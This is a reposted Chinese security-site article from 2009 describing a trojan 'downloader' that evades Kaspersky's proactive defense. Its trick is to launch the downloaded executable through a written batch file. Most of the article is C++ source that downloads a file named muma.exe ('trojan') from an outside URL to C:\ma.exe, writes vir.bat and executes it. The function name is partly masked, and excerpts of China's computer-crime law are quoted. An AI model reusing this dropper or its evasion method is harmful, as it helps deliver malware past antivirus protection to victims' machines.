绕过卡巴主动防御策略的下载者

2009-7-27 10:44| 投稿: security

免责声明：本站系公益性非盈利IT技术普及网，本文由投稿者转载自互联网的公开文章，文末均已注明出处，其内容和图片版权归原网站或作者所有，文中所述不代表本站观点，若有无意侵权或转载不当之处请从网站右下角联系我们处理，谢谢合作！

摘要: 　　卡巴检测的机理是：文件下载a.exe->文件运行a.exe（判断为下载者）　　　　新的思路：文件下载a.exe->写run.bat->运行run.bat（不判断为下载者）　　　　...

　　卡巴检测的机理是：文件下载a.exe->文件运行a.exe（判断为下载者）　　　　新的思路：文件下载a.exe->写run.bat->运行run.bat（不判断为下载者）　　　　##不提供下载，程序关键部分已经修改##　　　　刑法第２８５条规定，违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。　　　　刑法修正案（七）在刑法第２８５条中增加两款（第二款、第三款）：　　　　“违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。”　　　　“提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。”　　　　/*　　　　Author: Friddy　　Email:qianyang@ssyeah.com　　QQ:568623　　*/　　　　#include "stdafx.h"　　#include <iostream.h>　　#include <fstream.h>　　#include <UrlMon.h>　　#include <string.h>　　#include <windows.h>　　#pragma comment(lib, "urlmon.lib")　　　　int APIENTRY WinMain(HINSTANCE hInstance,　　HINSTANCE hPrevInstance,　　LPSTR lpCmdLine,　　int nCmdShow)　　{ char muma[]="http://www.friddy.cn/muma.exe";　　// TODO: Place code here.　　while(true){　　HRESULT hr = URLDownloadToXXXXXXXXX(0, muma,"C:\\ma.exe", 0,NULL);　　if (hr== S_OK)　　{ const char filename[] = "c:\\vir.bat";　　ofstream o_file;　　o_file.open(filename);　　o_file <<"echo off"<<endl;　　o_file <<"C:\\ma.exe"<<endl;　　o_file.close();　　WinExec("C:\\vir.bat",0);　　return 0;　　Sleep(10000);　　}　　}　　return 0;　　}

Tag标签: nbsp 或者 include 计算机有期徒刑系统刑法信息前款 file

小编推荐：欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术，请点击这里注册账号，公开课频道价值万元IT培训教程免费学，让您少走弯路、事半功倍，好工作升职加薪！

免责声明：本站系公益性非盈利IT技术普及网，本文由投稿者转载自互联网的公开文章，文末均已注明出处，其内容和图片版权归原网站或作者所有，文中所述不代表本站观点，若有无意侵权或转载不当之处请从网站右下角联系我们处理，谢谢合作！